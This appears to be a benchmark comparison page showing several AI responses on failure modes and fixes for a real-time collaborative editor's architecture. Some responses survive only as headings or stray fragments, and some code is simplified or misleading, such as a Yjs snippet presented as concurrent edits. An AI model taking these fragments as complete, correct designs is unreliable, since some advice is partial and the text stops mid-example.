Single-shot · temp 0.7 · blind votes · identical prompts
Identify failure modes, race conditions, and scaling bottlenecks in a collaborative document editor architecture.
Here's the architecture for a real-time collaborative document editor (like Google Docs):

**System Overview:**
- Frontend: React SPA with WebSocket connections
- Backend: Node.js API servers behind a load balancer (round-robin)
- Database: PostgreSQL for document storage, Redis for session cache
- Real-time: Each API server maintains its own WebSocket connections to clients
- Sync Strategy: Last-write-wins with timestamps from client clocks
- Storage: Documents saved as full HTML snapshots every 30 seconds
- Auth: JWT tokens with 24-hour expiry, stored in localStorage
- CDN: CloudFront for static assets, also caches API responses for 5 minutes

**Data Flow:**
1. User types → change event sent via WebSocket to their connected server
2. Server writes change to PostgreSQL
3. Server broadcasts change to all WebSocket clients connected to THAT server
4. Other servers poll PostgreSQL every 2 seconds for changes
5. Conflict resolution: if two users edit the same paragraph, last timestamp wins

**Scaling Plan:**
- Horizontal scaling by adding more API servers
- Database read replicas for read-heavy operations
- Document partitioning by organization ID

Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
Below is a systematic “failure‑mode → root cause → mitigation” map for the architecture you described.
I grouped the items into four logical layers (client ↔ network ↔ API ↔ data) and then added a cross‑cutting “operational” section (security, observability, cost, etc.). For each problem I list a concrete remedy and the main trade‑offs you’ll have to consider.
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 1.1 | Lost or out‑of‑order WebSocket messages | TCP guarantees order, but a client can reconnect to a different API instance and miss messages that were broadcast only on the original server. | Introduce a message‑sequence number + ACK on the client side and a re‑play buffer on each server (e.g., recent 10 s of changes). When a client reconnects, it sends the last sequence it processed and the server re‑sends any missing deltas. <br>Trade‑off: extra memory on the server and a small latency spike on reconnect; complexity in the client‑side state machine. |
| 1.2 | Clock skew → wrong “last‑write‑wins” | Clients use their own clocks for timestamps; a fast clock can overwrite a slower one even if the edit happened later. | Server‑generated timestamps (e.g., monotonic logical clock or ULID) instead of client clocks. The client can still send a provisional timestamp for UI ordering, but the authoritative order comes from the server. <br>Trade‑off: adds a round‑trip for each edit (or a small server‑side queue) and requires the server to keep a per‑document logical clock. |
| 1.3 | JWT theft / replay | Token stored in localStorage is accessible to any script on the page (XSS) and can be replayed on another device. | Store JWT in an HttpOnly Secure SameSite cookie and rotate it frequently (e.g., short‑lived access token + refresh token). Use refresh‑token rotation and revocation list. <br>Trade‑off: more complex auth flow; need CSRF protection for cookie‑based auth. |
| 1.4 | Network partitions → “split‑brain” edits | A client may be isolated from the primary API server and connect to a secondary that has stale data. | Use a centralised real‑time broker (e.g., Redis Streams, NATS, or a dedicated OT/CRDT service) that all API instances subscribe to, instead of per‑server broadcast. <br>Trade‑off: introduces a new component and network hop, but guarantees total ordering across the cluster. |
| 1.5 | Large payloads in WebSocket frames | Sending full HTML snapshots every 30 s can overflow the socket buffer on low‑bandwidth connections. | Compress deltas (e.g., JSON‑diff, operational‑transform/CRDT delta) and send only the delta, not the full snapshot. Keep periodic full snapshots for recovery only. <br>Trade‑off: requires a diff algorithm and versioning; adds CPU overhead on both client and server. |
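The sequence-number + ACK + replay-buffer mitigation in row 1.1 can be sketched as a small in-memory structure. This is a minimal sketch: the class name `ReplayBuffer`, its method names, and the 10 s window are illustrative assumptions, not part of the original design.

```javascript
// Sketch of the row-1.1 mitigation: every outgoing delta gets a
// server-assigned sequence number, and a bounded buffer lets a
// reconnecting client ask for "everything after seq N".
class ReplayBuffer {
  constructor(maxAgeMs = 10_000) {
    this.maxAgeMs = maxAgeMs;
    this.nextSeq = 1;
    this.entries = []; // { seq, at, delta }, oldest first
  }

  // Called for every outgoing delta; returns the assigned sequence number.
  push(delta, now = Date.now()) {
    const seq = this.nextSeq++;
    this.entries.push({ seq, at: now, delta });
    // Evict entries older than the replay window.
    while (this.entries.length && now - this.entries[0].at > this.maxAgeMs) {
      this.entries.shift();
    }
    return seq;
  }

  // On reconnect, the client sends the last seq it processed.
  // Returns null when the window was exceeded → client needs a full snapshot.
  since(lastSeq) {
    if (this.entries.length && this.entries[0].seq > lastSeq + 1) {
      return null; // gap: oldest buffered entry is past what the client has
    }
    return this.entries.filter(e => e.seq > lastSeq).map(e => e.delta);
  }
}
```

A client that reconnects within the window gets the missing deltas; one that has been away longer falls back to a snapshot, which is exactly the trade-off the table calls out.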
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 2.1 | Broadcast limited to “clients on the same server” | Server A never sees changes from Server B unless the DB poll picks them up; a 2‑second poll window creates a visible lag and possible race conditions. | Replace polling with a publish/subscribe bus (Redis Pub/Sub, Kafka, or a dedicated WebSocket message broker). Each server publishes its delta and subscribes to all others. <br>Trade‑off: extra infrastructure, need to handle message ordering and at‑least‑once delivery. |
| 2.2 | Polling interval too coarse → race conditions | Two users editing the same paragraph on different servers may both write to DB before the poll catches the other’s change, leading to “last‑write‑wins” conflicts. | Use a write‑ahead log / change‑feed (PostgreSQL logical replication, WAL‑2‑JSON, or a dedicated event store). Servers consume the feed in real time, eliminating the need for polling. <br>Trade‑off: more complex DB setup; requires idempotent handling of events. |
| 2.3 | Database write contention | Every keystroke (or batch of keystrokes) triggers a write to PostgreSQL; high‑frequency edits can cause row‑level lock contention on the document table. | Batch edits in memory (e.g., 100 ms window) and write a single UPDATE per user per batch. Alternatively, store deltas in a separate “edits” table and apply them asynchronously to the main snapshot. <br>Trade‑off: introduces a small latency for persistence; adds a background compaction job. |
| 2.4 | Single point of failure in WebSocket connection handling | If a single API instance crashes, all its connected clients lose their real‑time channel until they reconnect. | Deploy a dedicated WebSocket gateway (e.g., Envoy, NGINX, or a managed service like AWS API Gateway WebSocket) that sits in front of the API servers and can gracefully detach/attach connections. <br>Trade‑off: extra network hop; need to forward messages to the correct backend (via sticky sessions or a message bus). |
| 2.5 | Load‑balancer sticky‑session misconfiguration | Round‑robin without stickiness forces a client to reconnect to a different server on each request, breaking the per‑server broadcast model. | Enable session affinity (IP‑hash or cookie‑based) for WebSocket upgrades, or better, decouple connection handling from business logic (see 2.4). <br>Trade‑off: can lead to uneven load distribution; affinity may break when a server is drained for maintenance. |
| 2.6 | Memory leak in per‑connection buffers | Keeping a per‑client delta buffer for replay can grow unbounded if a client stays idle for a long time. | Set a TTL on buffers (e.g., 30 s) and drop the oldest entries when the buffer exceeds a size limit. Use a circular buffer implementation. <br>Trade‑off: a very slow client may miss some deltas and need to request a full snapshot. |
| 2.7 | Back‑pressure on WebSocket writes | If a client’s network is slow, the server’s write buffer can fill, causing the Node.js event loop to block or crash. | Implement flow‑control: pause reading from the source when the socket’s bufferedAmount exceeds a threshold, and resume after a drain event. <br>Trade‑off: adds latency for slow clients; may need to drop or compress older deltas. |
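Row 2.7's flow control can be sketched as a thin wrapper around a socket: deltas are queued instead of written when the buffer is above a high-water mark, and flushed on drain. The socket shape (`bufferedAmount`/`send`) mirrors the browser/ws API; the class name and the 64 KB threshold are illustrative assumptions.

```javascript
// Sketch of row 2.7: stop forwarding deltas to a client whose socket
// buffer is above a high-water mark, queue them, and flush once the
// buffer drains, instead of letting Node's write buffer grow unbounded.
class FlowControlledSender {
  constructor(socket, highWaterMark = 64 * 1024) {
    this.socket = socket;
    this.highWaterMark = highWaterMark;
    this.queue = [];
  }

  // Returns true if sent immediately, false if queued under back-pressure.
  send(delta) {
    if (this.socket.bufferedAmount > this.highWaterMark) {
      this.queue.push(delta); // hold instead of blocking the event loop
      return false;
    }
    this.socket.send(delta);
    return true;
  }

  // Call when the socket reports it has drained.
  onDrain() {
    while (this.queue.length && this.socket.bufferedAmount <= this.highWaterMark) {
      this.socket.send(this.queue.shift());
    }
  }
}
```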
| # | Potential Failure / Race | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 3.1 | Snapshot every 30 s → storage churn | Writing a full HTML blob every half‑minute for many active documents can saturate I/O and increase storage costs. | Store only incremental deltas and generate a snapshot lazily (e.g., after N edits or when a user requests a version). Keep a periodic “checkpoint” (e.g., every 5 min) for fast recovery. <br>Trade‑off: recovery requires replaying deltas; more complex compaction logic. |
| 3.2 | Read‑replica lag | If the API reads from replicas for “current document state”, lag can cause a client to see stale data after a recent edit. | Read‑your‑writes: after a successful write, read back from the primary (or use a “write‑through cache” in Redis). <br>Trade‑off: extra read load on the primary; may need to tune replica lag thresholds. |
| 3.3 | PostgreSQL row‑level lock contention | Simultaneous UPDATEs on the same document row cause lock waiting, increasing latency and possibly deadlocks. | Use SELECT … FOR UPDATE SKIP LOCKED on a “pending edits” table, or store edits in a separate table keyed by (document_id, edit_seq) and let a background worker merge them into the snapshot. <br>Trade‑off: more tables and background jobs; eventual consistency for the snapshot. |
| 3.4 | Redis cache eviction / stale session data | If the session cache is not sized correctly, eviction can cause a user to lose their edit‑state, forcing a full reload. | Use a TTL per session (e.g., 5 min) and a “fallback” to DB if a cache miss occurs. Monitor cache hit‑rate and size the cluster accordingly. <br>Trade‑off: higher memory cost; occasional extra DB reads. |
| 3.5 | Schema evolution / migration downtime | Adding a new column to the document table (e.g., for metadata) can lock the table for a noticeable period. | Use online schema change tools (e.g., pg_repack, pt-online-schema-change) or add new columns with default NULL and back‑fill in batches. <br>Trade‑off: longer migration window; need to coordinate with rolling releases. |
| 3.6 | Data loss on sudden crash | If a write is acknowledged to the client before PostgreSQL has flushed to disk, a crash could lose the edit. | Enable synchronous_commit = on for critical tables, or use two‑phase commit with a write‑ahead log in Redis that is persisted before acknowledging. <br>Trade‑off: higher latency for each write; extra complexity in failure recovery. |
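Row 3.2's read-your-writes can be sketched as a routing decision: after a write, the document's reads go to the primary until the replicas have had time to catch up. The class name and the 500 ms lag window are illustrative assumptions, not part of the original design.

```javascript
// Sketch of row 3.2: route a document's reads to the primary for a short
// window after each write, so a user never sees stale data right after
// their own edit. Replica-lag window is an assumed tuning parameter.
class ReadRouter {
  constructor(maxReplicaLagMs = 500) {
    this.maxReplicaLagMs = maxReplicaLagMs;
    this.lastWrite = new Map(); // docId -> timestamp of last write
  }

  recordWrite(docId, now = Date.now()) {
    this.lastWrite.set(docId, now);
  }

  // 'primary' while a recent write may not have replicated yet.
  target(docId, now = Date.now()) {
    const t = this.lastWrite.get(docId);
    return t !== undefined && now - t < this.maxReplicaLagMs
      ? 'primary'
      : 'replica';
  }
}
```

The trade-off in the table shows up directly: every recently written document adds read load to the primary for one lag window.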
| # | Issue | Why it Happens | Mitigation (with trade‑offs) |
|---|---|---|---|
| 4.1 | CDN caching of API responses | Caching API JSON for 5 min can serve stale document data after an edit. | Add Cache-Control: no‑store on any endpoint that returns mutable document state. Use CDN only for static assets and truly immutable API calls (e.g., list of templates). <br>Trade‑off: loses the small latency benefit of CDN for those endpoints. |
| 4.2 | Horizontal scaling without sharding | Adding more API servers only spreads load; the DB remains a single bottleneck for writes. | Partition documents by organization ID (or hash of doc‑id) and assign each partition to a dedicated DB shard (or use a multi‑tenant PostgreSQL with separate schemas). <br>Trade‑off: operational overhead of managing multiple shards; cross‑shard queries become more complex. |
| 4.3 | Single point of failure in load balancer | If the LB crashes, all traffic is lost. | Deploy a highly‑available LB pair (e.g., AWS ALB with multiple AZs, or HAProxy with VRRP). <br>Trade‑off: cost of extra instances and health‑check configuration. |
| 4.4 | Observability gaps | No metrics on WebSocket latency, queue depth, or DB write latency → hard to detect a bottleneck. | Instrument the stack: Prometheus metrics for socket bufferedAmount, DB query time, Redis hit‑rate; distributed tracing (OpenTelemetry) across the WebSocket → API → DB path. <br>Trade‑off: adds CPU/IO overhead and requires a monitoring stack. |
| 4.5 | Security – CSRF on JWT cookie | If you move JWT to HttpOnly cookie, a malicious site could still trigger a request with the cookie. | SameSite=Strict or Lax plus CSRF token for state‑changing endpoints. <br>Trade‑off: may break legitimate cross‑origin use cases (e.g., embedding the editor in another domain). |
| 4.6 | Versioning / backward compatibility | Clients may be on older JS bundles that expect a different message format. | Add a version field in every WebSocket message and have the server negotiate a compatible protocol (or reject with a clear error). <br>Trade‑off: extra code path for version handling; need to retire old versions. |
| 4.7 | Cost of frequent snapshots | Storing a full HTML snapshot every 30 s for thousands of documents can explode storage costs. | Compress snapshots (gzip/ Brotli) and store them in object storage (S3) with lifecycle policies, while keeping only the latest N snapshots in PostgreSQL. <br>Trade‑off: additional latency when retrieving older versions; need a background job to sync between DB and object storage. |
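Row 4.6's protocol negotiation can be sketched as a single check on every incoming WebSocket message. The supported-version set and the message shape are illustrative assumptions.

```javascript
// Sketch of row 4.6: every WebSocket message carries a `version` field,
// and the server rejects versions it cannot serve with a clear error
// instead of mis-parsing a message from an old JS bundle.
const SUPPORTED = new Set([1, 2]); // assumed: currently served protocol versions

function negotiate(message) {
  if (typeof message.version !== 'number') {
    return { ok: false, error: 'missing protocol version' };
  }
  if (!SUPPORTED.has(message.version)) {
    return {
      ok: false,
      error: `unsupported version ${message.version}; supported: 1, 2`,
    };
  }
  return { ok: true, version: message.version };
}
```

Retiring an old version then means removing it from `SUPPORTED`, which turns silent format mismatches into explicit client-visible errors.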
| Phase | Primary Goal | Key Changes | Approx. Effort |
|---|---|---|---|
| Phase 1 – Real‑time reliability | Remove per‑server broadcast & polling | • Introduce a central pub/sub broker (Redis Streams or NATS). <br>• Switch to server‑generated timestamps. <br>• Add sequence‑number ACK/replay for reconnects. | 2‑3 weeks (broker setup + code changes). |
| Phase 2 – Data‑layer optimisation | Reduce DB contention & storage churn | • Store deltas in an “edits” table, periodic snapshot worker. <br>• Batch DB writes (100 ms window). <br>• Enable logical replication feed for near‑real‑time change propagation. | 3‑4 weeks (schema changes + background workers). |
| Phase 3 – Security & auth hardening | Prevent token theft & stale cache | • Move JWT to HttpOnly SameSite cookie + refresh‑token rotation. <br>• Remove CDN caching for mutable API endpoints. | 1‑2 weeks (auth flow changes). |
| Phase 4 – Scaling & resilience | Prepare for horizontal growth | • Deploy a dedicated WebSocket gateway with sticky‑session fallback. <br>• Add DB sharding/partitioning by org ID. <br>• Set up HA load balancer and health checks. | 4‑6 weeks (infrastructure provisioning). |
| Phase 5 – Observability & ops | Detect and react to failures early | • Export Prometheus metrics & OpenTelemetry traces. <br>• Implement alerting on socket lag, DB write latency, Redis hit‑rate. | 1‑2 weeks (instrumentation). |
| Category | Core Problem | Quick Fix | Long‑Term Fix |
|---|---|---|---|
| Real‑time ordering | Client timestamps + per‑server broadcast | Server‑generated timestamps + ACK replay | Central pub/sub + CRDT/OT engine |
| Latency & lost updates | 2‑s DB poll + reconnection to different server | Reduce poll to < 200 ms or use change‑feed | Event stream (Logical Replication / Kafka) |
| DB write contention | One row per document, many concurrent UPDATEs | Batch edits, store deltas in separate table | Append‑only log + background compaction |
| Snapshot storage | Full HTML every 30 s | Store only deltas, compress snapshots | Object‑store checkpoints + lazy snapshot generation |
| Auth & token safety | JWT in localStorage | HttpOnly SameSite cookie + refresh rotation | OAuth‑style short‑lived access tokens + revocation list |
| Scaling bottleneck | Single PostgreSQL primary | Read‑replicas for reads, logical replication for writes | Horizontal sharding / multi‑tenant schemas |
| Cache staleness | CDN caching API responses | Cache-Control: no-store on mutable endpoints | Edge‑side invalidation via webhook on edit |
| Observability | No metrics on WebSocket health | Add simple latency counters | Full distributed tracing + alerting pipeline |
Implementing the Phase 1 changes (centralised pub/sub + server timestamps) will instantly eliminate the most visible race conditions (out‑of‑order updates, stale broadcasts). From there, you can progressively address storage, security, and scaling concerns while keeping the system observable and resilient.
This architecture for a real-time collaborative document editor is a solid starting point, but it contains several potential failure modes, race conditions, and scaling bottlenecks. We'll outline these issues by category and provide specific solutions, along with trade-offs for each.
| Issue | Solution | Trade-off |
|---|---|---|
| Client timestamp conflicts | Use server timestamps or CRDT | Complexity vs correctness |
| Polling DB for changes | Use LISTEN/NOTIFY or CDC | Infra changes |
| WebSocket scaling | Use Redis Pub/Sub or managed service | Increased infra complexity |
| JWT in localStorage | Use Secure HttpOnly cookies | Auth flow complexity |
| Full document snapshots | Store diffs + snapshots | More storage logic |
| CDN caching API | Use no-store / ETags | Lower cache hit rate |
| Redis single point | Use Redis cluster | Higher cost |
| PostgreSQL SPOF | Use managed DB with failover | Cost, setup |
| Load balancer routing | Use sticky sessions | State management |
| Org-based partitioning | Add finer-grained partitioning | Complexity |
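The LISTEN/NOTIFY row above can be sketched with a Postgres client. The client object is injected here so the wiring is visible without a live database; the channel name `doc_changes` and the JSON payload shape are assumptions (a trigger on the changes table would have to send them).

```javascript
// Sketch of the LISTEN/NOTIFY alternative to polling: the database sends
// a notification on every committed change and each API server relays it
// to its local WebSocket clients. `pgClient` is expected to look like a
// `pg` connection (query + 'notification' events).
function subscribeToChanges(pgClient, onChange) {
  pgClient.query('LISTEN doc_changes');
  pgClient.on('notification', msg => {
    // NOTIFY payloads are strings; a trigger is assumed to send JSON.
    onChange(JSON.parse(msg.payload));
  });
}
```

Compared with the 2-second poll, changes arrive push-style with no per-server query load, at the cost of keeping a dedicated listening connection per server.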
By addressing these failure modes and bottlenecks with targeted improvements, this architecture can scale more robustly while maintaining real-time collaboration and data integrity.
The proposed architecture for the real-time collaborative document editor has several potential failure modes, race conditions, and scaling bottlenecks. Here are the identified issues and proposed solutions with their trade-offs:
Single Point of Failure: Load Balancer
Scaling Bottleneck: WebSocket Connections
Race Condition: Document Updates
Scaling Bottleneck: Database Writes
Scalability Limit: Document Partitioning
Security Concern: JWT Token Storage
Caching Effectiveness: API Response Caching
By addressing these potential issues, the proposed architecture can be improved to achieve better reliability, scalability, and performance for the real-time collaborative document editor.
I'll analyze this architecture systematically and identify key issues along with potential solutions:
Solution B: Move to Kafka for event streaming
Recommendations for Implementation Priority:
This would provide a more robust foundation while keeping immediate implementation complexity manageable. The more complex solutions (like sharding) can be implemented as needed based on actual usage patterns and growth.
**Issue:** Client connections can fail due to network issues or server restarts, causing lost updates.
**Solution:** Implement automatic reconnection with change buffering.
**Trade-offs:** Increases client-side complexity; potential for complex conflict resolution when reconnecting after extended offline periods.
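The reconnection-with-buffering idea above can be sketched on the client side: while the socket is down, local edits accumulate and are flushed in order once the connection reopens. Class and method names are illustrative; conflict handling after long offline periods is out of scope here.

```javascript
// Sketch of automatic reconnection with change buffering: edits made
// while offline are queued and replayed in order when the socket reopens.
class ReconnectingSession {
  constructor(sendFn) {
    this.sendFn = sendFn;   // e.g. wraps ws.send in a real client
    this.connected = false;
    this.pending = [];
  }

  submit(change) {
    if (this.connected) {
      this.sendFn(change);
    } else {
      this.pending.push(change); // buffer while offline
    }
  }

  onOpen() {
    this.connected = true;
    // Replay buffered edits in original order.
    while (this.pending.length) this.sendFn(this.pending.shift());
  }

  onClose() {
    this.connected = false;
  }
}
```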
**Issue:** Changes only broadcast to clients connected to the same server.
**Solution:** Replace polling with a proper pub/sub system.
**Trade-offs:** Adds Redis as another critical component; requires handling Redis outages.

**Issue:** If PostgreSQL fails, the entire system becomes unusable.
**Solution:** Implement a multi-level persistence strategy.
**Trade-offs:** Significantly increases operational complexity; eventual consistency challenges.

**Issue:** Using client clocks for conflict resolution is unreliable.
**Solution:** Implement proper distributed sequence tracking.
**Trade-offs:** OT/CRDTs introduce significant implementation complexity; require more metadata with each change.

**Issue:** Paragraph-level "last-write-wins" causes data loss during concurrent edits.
**Solution:** Implement finer-grained conflict resolution.
**Trade-offs:** Increases computational overhead; more complex data model.

**Issue:** localStorage tokens are vulnerable to XSS; no revocation mechanism.
**Solution:** Improve token security.
**Trade-offs:** More complex authentication flow; additional Redis dependency.

**Issue:** Database becomes a bottleneck with high concurrent editing.
**Solution:** Distributed event sourcing architecture.
**Trade-offs:** Increases system complexity; potentially higher infrastructure costs.

**Issue:** Full HTML snapshots are storage-inefficient and risky.
**Solution:** Hybrid storage approach.
**Trade-offs:** More complex recovery and rendering logic; requires a migration strategy.

**Issue:** 5-minute API caching conflicts with real-time editing.
**Solution:** Targeted caching strategy.
**Trade-offs:** Reduced CDN effectiveness; potentially higher origin load.

**Issue:** Uneven connection distribution across servers.
**Solution:** Dedicated real-time tier.
**Trade-offs:** Additional infrastructure component; higher operational complexity.
These changes would significantly improve reliability, correctness, and performance of your collaborative editing system.
Problem:
Failure Scenarios:
```
User A (clock: 2024-01-01 10:00:00) types "Hello"
User B (clock: 2024-01-01 09:59:59) types "World"

Result: "Hello" wins even though "World" was actually typed later
```
Solutions:
| Approach | Pros | Cons |
|---|---|---|
| Server-assigned Lamport clocks | Logical ordering, no clock sync needed | Requires coordination |
| Hybrid logical clocks (HLC) | Combines wall-clock + logical counter | More complex implementation |
| Operational Transform (OT) | Industry standard, handles intent | Complex to implement correctly |
| CRDT (Conflict-free Replicated Data Types) | Mathematically guaranteed convergence | Memory overhead, learning curve |
Recommended: Implement CRDT (Yjs or Automerge library)
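The server-assigned Lamport clock row in the table above can be sketched in a few lines: the server keeps a per-document logical counter, stamps every edit with it, and breaks ties deterministically, so ordering no longer depends on client wall clocks. Names and the tiebreak rule are illustrative assumptions.

```javascript
// Sketch of server-assigned Lamport clocks: a per-document logical
// counter replaces unreliable client timestamps for ordering edits.
class LamportClock {
  constructor() {
    this.counters = new Map(); // docId -> last issued tick
  }

  // Stamp an outgoing edit; also advances past any tick seen from peers.
  tick(docId, seen = 0) {
    const next = Math.max(this.counters.get(docId) || 0, seen) + 1;
    this.counters.set(docId, next);
    return next;
  }
}

// Total order: compare ticks, break ties deterministically by userId.
function ordered(a, b) {
  if (a.tick !== b.tick) return a.tick - b.tick;
  return a.userId < b.userId ? -1 : 1;
}
```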
Problem:
Failure Scenario:
```
Time 0s:   User A (Server 1) types "A"
Time 0.5s: User B (Server 2) types "B"
Time 2s:   Server 2 polls, gets "A", broadcasts to User B
Time 2.5s: User C (Server 1) sees "AB", User D (Server 2) sees "BA"
```
Solutions:
| Approach | Latency | Complexity | Cost |
|---|---|---|---|
| Redis Pub/Sub | <50ms | Low | $ |
| RabbitMQ/Kafka | <100ms | Medium | $$ |
| Dedicated WebSocket service (Socket.io with Redis adapter) | <30ms | Low | $ |
Recommended: Redis Pub/Sub with sticky sessions
```javascript
// On any server receiving a change
redis.publish(`document:${docId}`, JSON.stringify(change));

// All servers subscribe (channel patterns require PSUBSCRIBE, not SUBSCRIBE)
redis.psubscribe('document:*');
redis.on('pmessage', (pattern, channel, message) => {
  const docId = channel.split(':')[1];
  broadcastToLocalClients(docId, JSON.parse(message));
});
```
Problem:
Solutions:
| Approach | Storage | Recovery | History |
|---|---|---|---|
| Event sourcing | 10x more | Complete | Full |
| Operational log + snapshots | 3x more | Good | Configurable |
| Differential snapshots | 2x more | Good | Limited |
Recommended: Event Sourcing with Periodic Snapshots
```sql
-- Operations table
CREATE TABLE operations (
  id BIGSERIAL PRIMARY KEY,
  document_id UUID,
  user_id UUID,
  operation JSONB,          -- CRDT operation
  server_timestamp TIMESTAMPTZ DEFAULT NOW(),
  lamport_clock BIGINT
);

-- Snapshots table (every 100 operations)
CREATE TABLE snapshots (
  document_id UUID,
  version BIGINT,
  content JSONB,
  created_at TIMESTAMPTZ
);
```
Problem:
Example:
```
Initial: "The cat"
User A: "The black cat"  (inserts "black ")
User B: "The fat cat"    (inserts "fat ")

Last-write-wins result: "The fat cat"  (User A's work lost)
Correct result: "The black fat cat" or "The fat black cat"
```
Solution: Use character-level CRDT (Yjs RichText type)
```javascript
import * as Y from 'yjs';

const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');

// Automatically handles concurrent inserts
ytext.insert(4, 'black ');  // User A
ytext.insert(4, 'fat ');    // User B
// Result preserves both edits with deterministic ordering
```
Problem:
Solution: Optimistic locking with version numbers
```sql
CREATE TABLE documents (
  id UUID PRIMARY KEY,
  version BIGINT NOT NULL,
  content JSONB,
  updated_at TIMESTAMPTZ
);

-- Update with version check
UPDATE documents
SET content = $1, version = version + 1, updated_at = NOW()
WHERE id = $2 AND version = $3
RETURNING version;
-- If no rows updated, a version conflict occurred
```
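Application code can drive that version-check UPDATE with a bounded retry loop. In this sketch the query and version-read are injected as functions so the control flow is visible without a database; the names and the 3-attempt limit are illustrative assumptions. `update(content, version)` is expected to resolve to the new version on success, or `null` when the version check failed (no rows updated).

```javascript
// Sketch of optimistic-locking retries: on a version conflict, re-read
// the current version and try the conditional UPDATE again, up to a cap.
async function saveWithRetry(update, readVersion, content, maxAttempts = 3) {
  let version = await readVersion();
  for (let attempt = 0; attempt < maxAttempts; attempt++) {
    const newVersion = await update(content, version);
    if (newVersion !== null) return newVersion; // success
    version = await readVersion();              // conflict: reload and retry
  }
  throw new Error('version conflict persisted after retries');
}
```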
Problem:
Calculation:
```
100 concurrent users × 60 keystrokes/min     =     100 writes/sec ✓
1,000 concurrent users                       =   1,000 writes/sec ✓
10,000 concurrent users                      =  10,000 writes/sec (at limit) ⚠️
100,000 concurrent users                     = 100,000 writes/sec ✗
```
Solutions:
| Approach | Throughput | Consistency | Complexity |
|---|---|---|---|
| Write-through cache (Redis) | 100k+ ops/sec | Eventual | Low |
| Batch operations | 50k+ ops/sec | Strong | Medium |
| Sharded PostgreSQL (Citus) | 500k+ ops/sec | Strong | High |
Recommended: Redis Write-Through Cache + Async Persistence
```javascript
// Write to Redis immediately (fast)
await redis.zadd(`ops:${docId}`, timestamp, JSON.stringify(op));

// Async worker drains to PostgreSQL in batches
setInterval(async () => {
  const ops = await redis.zrange(`ops:${docId}`, 0, 99);
  await pg.query('INSERT INTO operations VALUES ...', ops);
  await redis.zrem(`ops:${docId}`, ...ops);
}, 1000);
```
Problem:
Calculation:
```
10 servers × 1,000 active docs × 0.5 qps = 5,000 queries/sec
Just for polling! Actual useful work is extra.
```
Solution: Already covered in #2 (Redis Pub/Sub)
Problem:
Solution: Never cache document content
```
Cache-Control: no-store, must-revalidate    // Document endpoints
Cache-Control: public, max-age=31536000     // Static assets only
```
Problem:
Solution: HttpOnly cookies + short-lived tokens + refresh tokens
```javascript
// Access token: 15 minutes, HttpOnly cookie
res.cookie('accessToken', jwt.sign({ /* claims */ }, secret, { expiresIn: '15m' }), {
  httpOnly: true,
  secure: true,
  sameSite: 'strict'
});

// Refresh token: 7 days, stored in Redis for revocation
const refreshToken = crypto.randomBytes(32).toString('hex');
await redis.setex(`refresh:${userId}`, 7 * 24 * 60 * 60, refreshToken);
```
Problem:
Solution: Periodic token refresh over WebSocket
```javascript
// Client
setInterval(() => {
  ws.send(JSON.stringify({ type: 'REFRESH_TOKEN', token: getNewToken() }));
}, 14 * 60 * 1000); // Every 14 minutes

// Server validates the token and updates the connection's auth state
```
Problem:
Solution: PostgreSQL with Patroni + HAProxy
```
        ┌─────────┐
        │ HAProxy │  (virtual IP)
        └────┬────┘
             ├──► [Primary] PostgreSQL + Patroni
             ├──► [Standby] PostgreSQL + Patroni
             └──► [Standby] PostgreSQL + Patroni
```
Problem:
Solution: Token bucket rate limiter
```javascript
const rateLimiter = new Map();

function checkRateLimit(userId) {
  const limit = rateLimiter.get(userId) || { tokens: 100, lastRefill: Date.now() };

  // Refill tokens (10 per second, i.e. one per 100 ms)
  const now = Date.now();
  const tokensToAdd = Math.floor((now - limit.lastRefill) / 100);
  limit.tokens = Math.min(100, limit.tokens + tokensToAdd);
  limit.lastRefill = now;

  if (limit.tokens < 1) return false;

  limit.tokens--;
  rateLimiter.set(userId, limit);
  return true;
}
```
```
              ┌─────────────┐
              │   Clients   │
              └──────┬──────┘
                     │ WSS (CRDT operations)
                     ▼
      ┌──────────────────────────────┐
      │    Load Balancer (Sticky)    │
      └──────┬───────────────────────┘
             │
     ┌───────┼────────┬────────┐
     ▼       ▼        ▼        ▼
  ┌─────┐ ┌─────┐  ┌─────┐  ┌─────┐
  │Node1│ │Node2│  │Node3│  │Node4│
  └──┬──┘ └──┬──┘  └──┬──┘  └──┬──┘
     │       │        │        │
     └───────┴────┬───┴────────┘
                  │
           ┌──────┴──────┐
           ▼             ▼
      ┌─────────┐  ┌──────────────┐
      │  Redis  │  │  PostgreSQL  │
      │ Pub/Sub │  │  + Patroni   │
      │ + Cache │  │ (HA Cluster) │
      └─────────┘  └──────────────┘
```
Key Changes:
Performance Targets:
Problem: Clients connected to different servers can't see each other's changes in real-time.
Race Condition Example:
```
T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2

Result: Inconsistent state between servers
```
Solutions:
| Solution | Trade-offs |
|---|---|
| Redis Pub/Sub for inter-server messaging | +Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed |
| Use WebSocket gateway (e.g., Socket.io with Redis adapter) | +Battle-tested, -Architectural change, -Added latency layer |
| Event sourcing + distributed log (Kafka) | +Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits |
Recommended: Redis Pub/Sub with message versioning:
```javascript
// Server A receives edit
async function handleEdit(userId, docId, change, timestamp) {
  const version = await db.incrementDocVersion(docId);

  // Broadcast to local clients
  broadcastToLocalClients(docId, { ...change, version, timestamp });

  // Broadcast to all servers via Redis
  await redis.publish(`doc:${docId}`, JSON.stringify({
    type: 'edit',
    change,
    version,
    timestamp,
    serverId: process.env.SERVER_ID
  }));

  // Write to DB
  await db.saveChange(docId, change, version, timestamp);
}

// All servers listen (channel patterns require PSUBSCRIBE)
redis.psubscribe('doc:*');
redis.on('pmessage', (pattern, channel, message) => {
  const { docId } = parseChannel(channel);
  const { serverId } = JSON.parse(message);

  // Ignore if from own server (already broadcast)
  if (serverId === process.env.SERVER_ID) return;

  // Broadcast to local clients with version info
  broadcastToLocalClients(docId, JSON.parse(message));
});
```
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.
Concrete Failure:
```
Real timeline:
T0 (actual 10:00:00): User A types "Hi"    (A's clock runs 10 s fast → stamps 10:00:10)
